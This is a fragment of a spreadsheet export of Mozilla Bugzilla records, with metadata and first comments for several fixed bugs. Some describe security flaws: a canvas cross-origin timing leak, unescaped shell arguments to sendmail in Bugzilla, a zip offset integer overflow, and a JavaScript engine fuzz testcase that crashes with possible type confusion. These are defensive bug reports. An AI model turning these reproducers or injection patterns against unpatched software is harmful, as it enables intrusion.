      <c r="O2079" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2079" t="inlineStr">
        <is>
          <t>[necko-triaged][necko-priority-queue][adv-esr115.6+r]</t>
        </is>
      </c>
      <c r="Q2079" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2079" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2079" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2079" t="n">
        <v>1</v>
      </c>
      <c r="U2079" t="n">
        <v>0</v>
      </c>
      <c r="V2079" t="n">
        <v>9</v>
      </c>
      <c r="W2079" t="inlineStr">
        <is>
          <t>Note: these incorrectly show up under WebSockets.
This applies to the crashes (16 in the last 6 months) with nsDNSService::Init on the stack.   about 1/4 of these are e5e5 crashes.
NOTE: all appear to be in 115ESR, and all are Win7, and all are startup crashes (which I suppose isn't surprising  nsDNSService::Init).  It's possible this is fixed in later versions, or it may be specific to Win7.
Crash report: https://crash-stats.mozilla.org/report/index/dde35565-4c20-48e8-b5fa-592fe0230927
Reason: ```EXCEPTION_ACCESS_VIOLATION_READ```
Top 10 frames of crashing thread:
```
0  xul.dll  mozilla::net::WebSocketChannel::DoStopSession  netwerk/protocol/websocket/WebSocketChannel.cpp:2382
1  ?  @0x0000000002b4ac7f  
2  xul.dll  _tailMerge_hid.dll  
3  xul.dll  nsCOMPtr&lt;nsIObliviousHttpService&gt;::assign_from_gs_contractid  xpcom/base/nsCOMPtr.h:867
3  xul.dll  nsCOMPtr&lt;nsIObliviousHttpService&gt;::nsCOMPtr  xpcom/base/nsCOMPtr.h:509
3  xul.dll  nsDNSService::Init  netwerk/dns/nsDNSService2.cpp:879
4  xul.dll  nsDNSService::GetSingleton  netwerk/dns/nsDNSService2.cpp:747
5  xul.dll  nsDNSService::GetXPCOMSingleton::&lt;lambda_0&gt;::operator const  netwerk/dns/nsDNSService2.cpp:717
6  xul.dll  nsDNSService::GetXPCOMSingleton  netwerk/dns/nsDNSService2.cpp:732
7  xul.dll  mozilla::xpcom::CreateInstanceImpl  xpcom/components/StaticComponents.cpp:11388
```</t>
        </is>
      </c>
      <c r="X2079" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2080">
      <c r="A2080" t="n">
        <v>1598157</v>
      </c>
      <c r="B2080" t="inlineStr">
        <is>
          <t>2019-11-20 15:09:50 -0800</t>
        </is>
      </c>
      <c r="C2080" t="inlineStr">
        <is>
          <t>Don't check for artifacts on mozilla-inbound</t>
        </is>
      </c>
      <c r="D2080" t="inlineStr">
        <is>
          <t>2019-11-21 13:51:44 -0800</t>
        </is>
      </c>
      <c r="E2080" t="n">
        <v>1</v>
      </c>
      <c r="F2080" t="n">
        <v>1</v>
      </c>
      <c r="G2080" t="n">
        <v>7</v>
      </c>
      <c r="H2080" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2080" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J2080" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2080" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2080" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2080" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2080" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2080" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2080" t="inlineStr"/>
      <c r="Q2080" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2080" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2080" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T2080" t="n">
        <v>1</v>
      </c>
      <c r="U2080" t="n">
        <v>0</v>
      </c>
      <c r="V2080" t="n">
        <v>4</v>
      </c>
      <c r="W2080" t="inlineStr">
        <is>
          <t>It is soon to be decommissioned, and already doesn't see enough activity to be worth checking.</t>
        </is>
      </c>
      <c r="X2080" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2081">
      <c r="A2081" t="n">
        <v>1298552</v>
      </c>
      <c r="B2081" t="inlineStr">
        <is>
          <t>2016-08-26 16:33:04 -0700</t>
        </is>
      </c>
      <c r="C2081" t="inlineStr">
        <is>
          <t>Canvas filters allow feDisplacementMaps to be applied to cross-origin images, allowing timing attacks on them</t>
        </is>
      </c>
      <c r="D2081" t="inlineStr">
        <is>
          <t>2018-04-11 09:51:19 -0700</t>
        </is>
      </c>
      <c r="E2081" t="n">
        <v>1</v>
      </c>
      <c r="F2081" t="n">
        <v>1</v>
      </c>
      <c r="G2081" t="n">
        <v>3</v>
      </c>
      <c r="H2081" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2081" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2081" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K2081" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L2081" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2081" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2081" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2081" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2081" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+][pixel-stealing]</t>
        </is>
      </c>
      <c r="Q2081" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2081" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2081" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T2081" t="n">
        <v>1</v>
      </c>
      <c r="U2081" t="n">
        <v>0</v>
      </c>
      <c r="V2081" t="n">
        <v>27</v>
      </c>
      <c r="W2081" t="inlineStr">
        <is>
          <t>Created attachment 8785481
testcase
See the last paragraph of bug 1287316 comment 29 - updateFilterOnWriteOnly is only checked on the first draw after the filter was set. If the canvas's IsWriteOnly state changes after that first draw, we don't update the filter, and happily apply feDisplacementMap filters.
This is bad because feDisplacementMap filter rendering can take different amounts of time depending on the input pixel, and the input pixel can be a cross-origin image drawn through drawImage.
In the testcase, the stuff in the top left corner should be a black square, not a black funny looking  blob.
Chrome also has this bug.</t>
        </is>
      </c>
      <c r="X2081" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2082">
      <c r="A2082" t="n">
        <v>386860</v>
      </c>
      <c r="B2082" t="inlineStr">
        <is>
          <t>2007-07-04 09:07:58 -0700</t>
        </is>
      </c>
      <c r="C2082" t="inlineStr">
        <is>
          <t>[SECURITY] Insufficient escaping of From address when using Sendmail</t>
        </is>
      </c>
      <c r="D2082" t="inlineStr">
        <is>
          <t>2007-08-23 14:03:08 -0700</t>
        </is>
      </c>
      <c r="E2082" t="n">
        <v>1</v>
      </c>
      <c r="F2082" t="n">
        <v>1</v>
      </c>
      <c r="G2082" t="n">
        <v>4</v>
      </c>
      <c r="H2082" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2082" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2082" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2082" t="inlineStr">
        <is>
          <t>2.23.4</t>
        </is>
      </c>
      <c r="L2082" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2082" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2082" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2082" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2082" t="inlineStr">
        <is>
          <t>[ready for 3.x]</t>
        </is>
      </c>
      <c r="Q2082" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2082" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2082" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T2082" t="n">
        <v>1</v>
      </c>
      <c r="U2082" t="n">
        <v>0</v>
      </c>
      <c r="V2082" t="n">
        <v>18</v>
      </c>
      <c r="W2082" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070508 (Debian-1.8.1.4-3) Galeon/2.0.2 (Debian package 2.0.2-4)
Build Identifier: 3.0
email_reply.pl performs insufficient escaping of arguments passed to sh -c sendmail.  This might be remotely exploitable; setting security flag.
Long story: After some hours battling, I could get email_reply.pm to run, but when passed valid mail data, it would fail with:
sh: -c: line 0: syntax error near unexpected token `newline'
sh: -c: line 0: `/usr/lib/sendmail -t -oi -i -f&lt;submit@bugzilla.example.com&gt;'
The mail data looks something like:
From lool@dooz.org Wed Jul  4 17:19:58 2007
Date: Wed, 4 Jul 2007 17:19:58 +0200
From: =?iso-8859-1?Q?Lo=EFc?= Minier &lt;lool@dooz.org&gt;
To: submit@bugzilla.example.com
Subject: Essai
Message-ID: &lt;20070704151958.GD9800@bee.dooz.org&gt;
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Essai
-- 
Loïc Minier
I worked around this problem by adding single quotes to:
push(@args, "-f'$from'") if $from;
in Bugzilla/Mailer.pm, around line 80.
This is with version 2.181 of Email::Send as found in Debian stable (etch) in the libemail-send-perl package.
Note: email_reply.pl still fails for me afterwards with:
sendmail: fatal: No recipient addresses found in message header
There was an error sending mail from '&lt;submit@bugzilla.bpl-group.org&gt;'
    to 'Loïc Minier &lt;lool@dooz.org&gt;':error when closing pipe to /usr/lib/sendmail:
Reproducible: Always</t>
        </is>
      </c>
      <c r="X2082" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2083">
      <c r="A2083" t="n">
        <v>1415313</v>
      </c>
      <c r="B2083" t="inlineStr">
        <is>
          <t>2017-11-07 13:26:55 -0800</t>
        </is>
      </c>
      <c r="C2083" t="inlineStr">
        <is>
          <t>Assertion failure: isDouble(), at js/Value.h:344 with TypedObject</t>
        </is>
      </c>
      <c r="D2083" t="inlineStr">
        <is>
          <t>2023-12-06 07:50:00 -0800</t>
        </is>
      </c>
      <c r="E2083" t="n">
        <v>1</v>
      </c>
      <c r="F2083" t="n">
        <v>1</v>
      </c>
      <c r="G2083" t="n">
        <v>3</v>
      </c>
      <c r="H2083" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2083" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2083" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2083" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2083" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2083" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2083" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2083" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2083" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect]</t>
        </is>
      </c>
      <c r="Q2083" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2083" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2083" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T2083" t="n">
        <v>1</v>
      </c>
      <c r="U2083" t="n">
        <v>0</v>
      </c>
      <c r="V2083" t="n">
        <v>14</v>
      </c>
      <c r="W2083" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 4e6df5159df3 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-stdcxx-compat --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe):
var Uint32Array = TypedObject.float32.array(3);
const ONE_MINUS_EPSILON = 1 - Math.pow(2, -53);
const f = new Float64Array([0, 0]);
const u = new Uint32Array(f.buffer);
const diff = function(a, b) {
    f[1] = b;
    u[3 - ENDIAN];
};
ENDIAN = 1;
diff(1, ONE_MINUS_EPSILON)
Backtrace:
received signal SIGSEGV, Segmentation fault.
#0  0x000000000055646c in JS::Value::setDouble (d=&lt;optimized out&gt;, this=0x7ffff42732d8) atdist/include/js/Value.h:344
#1  JS::Value::setNumber (this=this@entry=0x7ffff42732d8, d=&lt;optimized out&gt;) at dist/include/js/Value.h:415
#2  0x0000000000893ab9 in js::MutableWrappedPtrOperations&lt;JS::Value, JS::MutableHandle&lt;JS::Value&gt; &gt;::setNumber (d=&lt;optimized out&gt;, this=&lt;optimized out&gt;) at dist/include/js/Value.h:1359
#3  js::LoadScalarfloat::Func (cx=0x7ffff6948000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/builtin/TypedObject.cpp:2794
#4  0x000000000055e631 in js::CallJSNative (cx=0x7ffff6948000, native=0x8939c0 &lt;js::LoadScalarfloat::Func(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/jscntxtinlines.h:291
#5  0x0000000000552dbf in js::InternalCallOrConstruct (cx=cx@entry=0x7ffff6948000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:472
#6  0x000000000055319d in InternalCall (cx=0x7ffff6948000, args=...) at js/src/vm/Interpreter.cpp:521
#7  0x0000000000546955 in js::CallFromStack (args=..., cx=&lt;optimized out&gt;) at js/src/vm/Interpreter.cpp:527
#8  Interpret (cx=0x7ffff6948000, state=...) at js/src/vm/Interpreter.cpp:3061
#9  0x0000000000552965 in js::RunScript (cx=0x7ffff6948000, state=...) at js/src/vm/Interpreter.cpp:422
#10 0x0000000000552e87 in js::InternalCallOrConstruct (cx=cx@entry=0x7ffff6948000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:494
#11 0x000000000055319d in InternalCall (cx=0x7ffff6948000, args=...) at js/src/vm/Interpreter.cpp:521
#12 0x0000000000546955 in js::CallFromStack (args=..., cx=&lt;optimized out&gt;) at js/src/vm/Interpreter.cpp:527
#13 Interpret (cx=0x7ffff6948000, state=...) at js/src/vm/Interpreter.cpp:3061
#14 0x0000000000552965 in js::RunScript (cx=0x7ffff6948000, state=...) at js/src/vm/Interpreter.cpp:422
#15 0x0000000000552e87 in js::InternalCallOrConstruct (cx=cx@entry=0x7ffff6948000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:494
#16 0x000000000055319d in InternalCall (cx=0x7ffff6948000, args=...) at js/src/vm/Interpreter.cpp:521
#17 0x0000000000546955 in js::CallFromStack (args=..., cx=&lt;optimized out&gt;) at js/src/vm/Interpreter.cpp:527
#18 Interpret (cx=0x7ffff6948000, state=...) at js/src/vm/Interpreter.cpp:3061
#19 0x0000000000552965 in js::RunScript (cx=0x7ffff6948000, state=...) at js/src/vm/Interpreter.cpp:422
#20 0x0000000000552e87 in js::InternalCallOrConstruct (cx=cx@entry=0x7ffff6948000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:494
#21 0x000000000055319d in InternalCall (cx=0x7ffff6948000, args=...) at js/src/vm/Interpreter.cpp:521
#22 0x0000000000553300 in js::Call (cx=&lt;optimized out&gt;, fval=..., fval@entry=..., thisv=..., args=..., rval=...) at js/src/vm/Interpreter.cpp:540
#23 0x0000000000890c00 in Reify (cx=cx@entry=0x7ffff6948000, type=type@entry=..., typedObj=..., typedObj@entry=..., offset=8, to=..., to@entry=...) at js/src/builtin/TypedObject.cpp:171
#24 0x0000000000892508 in js::TypedObject::obj_getArrayElement (cx=0x7ffff6948000, typedObj=typedObj@entry=..., typeDescr=..., typeDescr@entry=..., index=index@entry=2, vp=vp@entry=...) at js/src/builtin/TypedObject.cpp:1860
#25 0x0000000000898f0f in js::TypedObject::obj_getElement (cx=0x7ffff6948000, obj=..., obj@entry=..., receiver=..., receiver@entry=..., index=2, vp=..., vp@entry=...) at js/src/builtin/TypedObject.cpp:1833
#26 0x00000000008991c3 in js::TypedObject::obj_getProperty (cx=0x7ffff6948000, obj=..., receiver=..., id=..., vp=...) at js/src/builtin/TypedObject.cpp:1770
#27 0x000000000055b3ad in js::GetProperty (cx=0x7ffff6948000, obj=..., receiver=..., id=..., vp=...) at js/src/vm/NativeObject.h:1603
#28 0x000000000055b46e in js::GetElement (cx=cx@entry=0x7ffff6948000, obj=obj@entry=..., receiver=receiver@entry=..., index=&lt;optimized out&gt;, vp=vp@entry=...) at js/src/jsobjinlines.h:238
#29 0x000000000053fff2 in js::GetObjectElementOperation (cx=0x7ffff6948000, op=&lt;optimized out&gt;, obj=..., receiver=..., key=..., res=...) at js/src/vm/Interpreter-inl.h:499
#30 0x0000000000541f52 in js::GetElementOperation (cx=0x7ffff6948000, op=JSOP_GETELEM, lref=..., rref=..., res=...) at js/src/vm/Interpreter-inl.h:627
#31 0x000000000054dd2a in Interpret (cx=0x7ffff6948000, state=...) at js/src/vm/Interpreter.cpp:2899
[...]
#41 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:8962
rax	0x0	0
rbx	0x7ffff42732e8	140737289597672
rcx	0x7ffff6c282ad	140737333330605
rdx	0x0	0
rsi	0x7ffff6ef7770	140737336276848
rdi	0x7ffff6ef6540	140737336272192
rbp	0x7fffffffab60	140737488333664
rsp	0x7fffffffab60	140737488333664
r8	0x7ffff6ef7770	140737336276848
r9	0x7ffff7fe4740	140737354024768
r10	0x58	88
r11	0x7ffff6b9e7a0	140737332766624
r12	0x7ffff6948000	140737330315264
r13	0x8	8
r14	0x7ffff4700360	140737294369632
r15	0x7fffffffab70	140737488333680
rip	0x55646c &lt;JS::Value::setNumber(double)+156&gt;
=&gt; 0x55646c &lt;JS::Value::setNumber(double)+156&gt;:	movl   $0x0,0x0
   0x556477 &lt;JS::Value::setNumber(double)+167&gt;:	ud2
Marking s-s because this assertion can indicate a type confusion.</t>
        </is>
      </c>
      <c r="X2083" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2084">
      <c r="A2084" t="n">
        <v>555200</v>
      </c>
      <c r="B2084" t="inlineStr">
        <is>
          <t>2010-03-26 07:36:03 -0700</t>
        </is>
      </c>
      <c r="C2084" t="inlineStr">
        <is>
          <t>Patch twisted log handling</t>
        </is>
      </c>
      <c r="D2084" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2084" t="n">
        <v>1</v>
      </c>
      <c r="F2084" t="n">
        <v>1</v>
      </c>
      <c r="G2084" t="n">
        <v>5</v>
      </c>
      <c r="H2084" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2084" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2084" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2084" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2084" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2084" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2084" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2084" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2084" t="inlineStr"/>
      <c r="Q2084" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2084" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2084" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2084" t="n">
        <v>1</v>
      </c>
      <c r="U2084" t="n">
        <v>0</v>
      </c>
      <c r="V2084" t="n">
        <v>3</v>
      </c>
      <c r="W2084" t="inlineStr">
        <is>
          <t>Created attachment 435165
exception handling in log exception handler
Our buildbot masters stop logging sometimes, which is bad.
This un-approved patch from upstream should help with that.  It's been backported to apply against twisted 8.0.1.  All tests pass except a few network tests, which I believe is unrelated.</t>
        </is>
      </c>
      <c r="X2084" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2085">
      <c r="A2085" t="n">
        <v>1166900</v>
      </c>
      <c r="B2085" t="inlineStr">
        <is>
          <t>2015-05-20 13:18:53 -0700</t>
        </is>
      </c>
      <c r="C2085" t="inlineStr">
        <is>
          <t>Memory safety bug due to bad test in nsZipArchive.cpp</t>
        </is>
      </c>
      <c r="D2085" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:14 -0700</t>
        </is>
      </c>
      <c r="E2085" t="n">
        <v>1</v>
      </c>
      <c r="F2085" t="n">
        <v>1</v>
      </c>
      <c r="G2085" t="n">
        <v>3</v>
      </c>
      <c r="H2085" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2085" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2085" t="inlineStr">
        <is>
          <t>Networking: JAR</t>
        </is>
      </c>
      <c r="K2085" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L2085" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2085" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2085" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2085" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2085" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+][adv-esr31.8+]</t>
        </is>
      </c>
      <c r="Q2085" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2085" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2085" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T2085" t="n">
        <v>1</v>
      </c>
      <c r="U2085" t="n">
        <v>0</v>
      </c>
      <c r="V2085" t="n">
        <v>30</v>
      </c>
      <c r="W2085" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows; rv:26.0) Gecko/20100101 Firefox/26.0
Build ID: 20150305021524
Steps to reproduce:
(Firefox 38.0.1)
nsZipArchive::GetDataOffset does not validate the archive's local header correctly. It uses the code:
790:  uint32_t len = mFd-&gt;mLen;
791:  const uint8_t* data = mFd-&gt;mFileData;
792:  uint32_t offset = aItem-&gt;LocalOffset();
793:  if (offset + ZIPLOCAL_SIZE &gt; len)
794:    return 0;
795:
796:  // -- check signature before using the structure, in case the zip file is corrupt
797:  ZipLocal* Local = (ZipLocal*)(data + offset);
798:  if ((xtolong(Local-&gt;signature) != LOCALSIG))
799:    return 0;
The problem is with the line 793. If offset (which comes directly from the archive field central-&gt;localhdr_offset) is &gt;= 0xffffffe2, the quantity offset + ZIPLOCAL_SIZE will overflow a uint32_t, resulting in a value &lt;= len. Line 797 will then compute data+offset, which will point somewhere arbitrary in memory. In almost every case, line 798 will then either cause a read-access violation or a failed comparison to LOCALSIG, which presumably means that nothing will use the corrupt item. It is, however, faintly possible that data+offset points to valid memory that contains LOCALSIG, which would lead to unpredictable behavior somewhere down the road. Hence, I have marked this as a security bug.
This bug seems likely to be the cause of https://bugzilla.mozilla.org/show_bug.cgi?id=1164141 . It might also be involved in https://bugzilla.mozilla.org/show_bug.cgi?id=596826 .</t>
        </is>
      </c>
      <c r="X2085" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2086">
      <c r="A2086" t="n">
        <v>1243068</v>
      </c>
      <c r="B2086" t="inlineStr">
        <is>
          <t>2016-01-26 10:44:31 -0800</t>
        </is>
      </c>
      <c r="C2086" t="inlineStr">
        <is>
          <t>Remove .emacs.d from analysis.telemetry.mozilla.org build</t>
        </is>
      </c>
      <c r="D2086" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E2086" t="n">
        <v>1</v>
      </c>
      <c r="F2086" t="n">
        <v>1</v>
      </c>
      <c r="G2086" t="n">
        <v>6</v>
      </c>
      <c r="H2086" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2086" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J2086" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K2086" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2086" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2086" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2086" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2086" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2086" t="inlineStr"/>
      <c r="Q2086" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2086" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2086" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2086" t="n">
        <v>1</v>
      </c>
      <c r="U2086" t="n">
        <v>0</v>
      </c>
      <c r="V2086" t="n">
        <v>2</v>
      </c>
      <c r="W2086" t="inlineStr">
        <is>
          <t>It has started a melpa routine that takes a minute.</t>
        </is>
      </c>
      <c r="X2086" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2087">
      <c r="A2087" t="n">
        <v>472507</v>
      </c>
      <c r="B2087" t="inlineStr">
        <is>
          <t>2009-01-07 08:31:38 -0800</t>
        </is>
      </c>
      <c r="C2087" t="inlineStr">
        <is>
          <t>full disclosure DOS crash at  [@ nsHTMLEditor::GetCSSBackgroundColorState(int*, nsAString_internal&amp;, int) ]</t>
        </is>
      </c>
      <c r="D2087" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E2087" t="n">
        <v>1</v>
      </c>
      <c r="F2087" t="n">
        <v>1</v>
      </c>
      <c r="G2087" t="n">
        <v>3</v>
      </c>
      <c r="H2087" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2087" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2087" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2087" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2087" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2087" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2087" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2087" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2087" t="inlineStr">
        <is>
          <t>[sg:dos]</t>
        </is>
      </c>
      <c r="Q2087" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2087" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2087" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2087" t="n">
        <v>1</v>
      </c>
      <c r="U2087" t="n">
        <v>0</v>
      </c>
      <c r="V2087" t="n">
        <v>2</v>
      </c>
      <c r="W2087" t="inlineStr">
        <is>
          <t>reported as
Firefox 3.0.5 remote vulnerability via queryCommandState - http://seclists.org/fulldisclosure/2009/Jan/0219.html
looks like it also crashes trunk Build identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20090105 Shiretoko/3.1b3pre Ubiquity/0.1.4
0  	XUL  	nsHTMLEditor::GetCSSBackgroundColorState  	editor/libeditor/html/nsHTMLEditor.cpp:2419
1 	XUL 	nsHTMLEditor::GetBackgroundColorState 	editor/libeditor/html/nsHTMLEditor.cpp:2317
2 	XUL 	nsBackgroundColorStateCommand::GetCurrentState 	editor/composer/src/nsComposerCommands.cpp:1004
3 	XUL 	nsMultiStateCommand::GetCommandStateParams 	editor/composer/src/nsComposerCommands.cpp:681
4 	XUL 	nsControllerCommandTable::GetCommandState 	embedding/components/commandhandler/src/nsControllerCommandTable.cpp:226
5 	XUL 	nsBaseCommandController::GetCommandStateWithParams 	embedding/components/commandhandler/src/nsBaseCommandController.cpp:201
6 	XUL 	nsCommandManager::GetCommandState 	embedding/components/commandhandler/src/nsCommandManager.cpp:249
7 	XUL 	nsHTMLDocument::QueryCommandState 	content/html/document/src/nsHTMLDocument.cpp:3981
8 	XUL 	NS_InvokeByIndex_P 	xpcom/reflect/xptcall/src/md/unix/xptcinvoke_unixish_x86.cpp:179
9 	XUL 	XPCWrappedNative::CallMethod 	js/src/xpconnect/src/xpcwrappednative.cpp:2424
10 	XUL 	XPC_WN_CallMethod 	js/src/xpconnect/src/xpcwrappednativejsops.cpp:1477
11 	libmozjs.dylib 	js_Invoke 	js/src/jsinterp.cpp:1313
12 	libmozjs.dylib 	js_Interpret 	js/src/jsinterp.cpp:5136
